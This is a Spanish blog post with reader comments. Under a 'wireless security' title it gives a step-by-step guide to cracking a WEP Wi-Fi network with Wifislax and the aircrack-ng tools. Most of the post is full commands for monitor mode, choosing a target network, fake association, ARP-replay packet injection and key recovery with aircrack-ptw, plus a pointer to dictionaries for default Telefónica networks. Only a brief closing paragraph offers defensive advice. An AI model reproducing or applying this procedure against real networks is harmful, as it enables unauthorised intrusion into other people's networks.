18 de febrero

Seguridad Wireless con Wifislax 3.1

Crackeando una red wireless con una tarjeta Intel Pro/Wireless 2200BG

Por Fran, 18 de febrero attime 15:41

Nuestra tarjeta inalámbrica debe ser capaz de soportar la inyección de paquetes, es decir ponerse en modo monitor. Por eso este manual se centra en un tipo específico de tarjetas inalámbricas: Intel PRO/WIreless 2200BG que usan el driver ipw2200 en linux. Para otras tarjetas habrá que investigar un poco, pero Wifislax, una live CD especialmente adaptada para el reconocimiento de tarjetas inalámbricas (wireless) y preparada para realizar auditorías wireless, está dotada con los drivers de casi todas las tarjetas inalámbricas.

Estos son los pasos a seguir:

  • 1. Insertar el Live CD y reiniciar el ordenador. Nos pedirá que ingresemos con el usuario "root" y contraseña "toor". El sistema se lanzará en modo texto pidiendonos que metamos el comando startx. Tras esto accederemos en modo gráfico obteniendo esta pantalla:

    Interfaz Wifislax 3.1

    A partir de ahora usaremos 3 terminales.

  • 2. En la primera terminal:
  • 2.1. Primero teclearemos el siguiente comando;
    rmmod ipw2200, con el que borramos el modulo que utiliza por defecto para nuestra tarjeta.
  • 2.2. Luego teclearemos modprobe ipw2200 rtap_iface=1, con el que instalamos el driver que nos permitirá inyectar paquetes.
  • 2.3. Tecleamos iwconfig para comprobar que las interfaces estan activas.
  • 2.4. Lanzamos el programa airodump para ver las redes disponibles de la siguiente manera, airodump-ng rtap0, elegimos el blanco de nuestro ataque, y posteriormente detenemos el proceso con Control+C.
  • Tecleamos:

    airodump-ng –c # -w wep rtap0

    donde la # debe ser sustituida por el número del canal de la red que habiamos seleccionado como blanco: el CH con mas fuerza, definido por la columna RXQ.

    y wep es el nombre del archivo en el que capturaremos los paquetes.

  • 3. En la 2ª terminal:
  • 3.1. Primero tecleamos el siguiente comando para asociarnos a la red deseada con una clave cualquiera;
    iwconfig eth1 essid “NOMBRE DE LA RED” key 11111111111.
  • 3.2. Luego teclearemos iwconfig para comprobar que estamos asociados. Tenemos que ver algo así
    eth1 IEEE 802.11g ESSID:”WLAN_9C″
    y si no se asocia es que igual estamos demasiado lejos y no podremos conectarnos
  • 3.3. Tecleamos

    aireplay-ng -3 –x 1024 –g 1000000 –b MAC OBJETIVO –h MAC ORIGEN –i rtap0 eth1

    Si no sabemos nuestro MAC (el origen) ponemos una cualquiera y nos contestará que debía aparecer ésta (entre paréntesis)... Paramos el proceso con Control+C y volvemos a teclear el mismo comando con la MAC buena. Así, comenzaremos a inyectar paquetes.

  • 3.4. Ahora hay que esperar a juntar por lo menos 20.000 paquetes en el campo DATA.
  • 4. En la 3ª terminal, cuando tengamos suficientes paquetes de datos, solo tenemos que teclear lo siguiente;
    aircrack-ptw wep-01.cap

    donde wep es el nombre del archivo que indicamos en el airodump, con una numeración correspondiente al nº de capturas con el mismo nombre.

  • Y listo!! La clave son los 10 dígitos hexadecimales que aparecen. Si fuera una clave de 128 bits serían 26 digitos hexadecimales.
  • Si el aircrack no es capaz de sacar la clave igual nos hacen g¡falta más paquetes de datos... Esperar hasta 40.000 o incluso hasta 100.000
    • Las redes de Telefónica cuya Essid no haya sido cambiada son todavía más fáciles de crackear, existiendo unos diccionarios que hacen que con tan solo un paqute de datos se puedan sacar. Si has llegado hasta aquí no te costará encontrarlos en internet y ver como se aplican

    Ahora ya sabes lo que tienes que hacer si quieres proteger tu red Wireless. Primeramente piensa en lo positivo de compartir los recursos: las conexiones de hoy en día van sobradas para tres o cuatro ordenadores y si pagas a medias con tu vecino te saldrá a la mitad. Pero si necesitas mucho ancho de banda, o tu vecino se pasa con el emule, cambia la Essid que viene por defecto, ocultala y utiliza contraseña WPA (más difícil de crackear). También puedes limitar el acceso a los ordenadores que tu quieras con los filtros MAC.

    Commentaires

    1. Viernes 15 de mayo de 2009 attime 20:45,

    Seguridad Wireless con Wifislax 3.1

    Me siento seguroooo! Txino

    2. Sábado 17 de octubre de 2009 attime 20:24, por Link

    pregunta!!

    este programa solo se puede usar con linux?????? pq yo solo uso Windows...

    3. Domingo 18 de octubre de 2009 attime 10:41,

    Seguridad Wireless con Wifislax 3.1

    Wifislax no es un programa, sino un disco de arranque con Linux como sistema operativo. Se trata de una distribución Linux con casi todos los drivers para tarjetas inalámbricas. Pero no tienes que hacer nada con tu Windows... tan solo arrancar el ordenador con el. Eso si, ya estarás usando Linux

    ajouter commentaire


    ¿Un mensaje, un comentario?

    • (Para crear párrafos, deja líneas vacías.)

    Añadir un documento
    ¿Quién eres? (opcional)